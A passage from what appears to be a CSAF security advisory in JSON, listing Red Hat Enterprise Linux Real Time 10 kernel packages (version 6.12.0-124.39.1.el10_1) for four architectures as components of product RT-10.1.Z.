"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
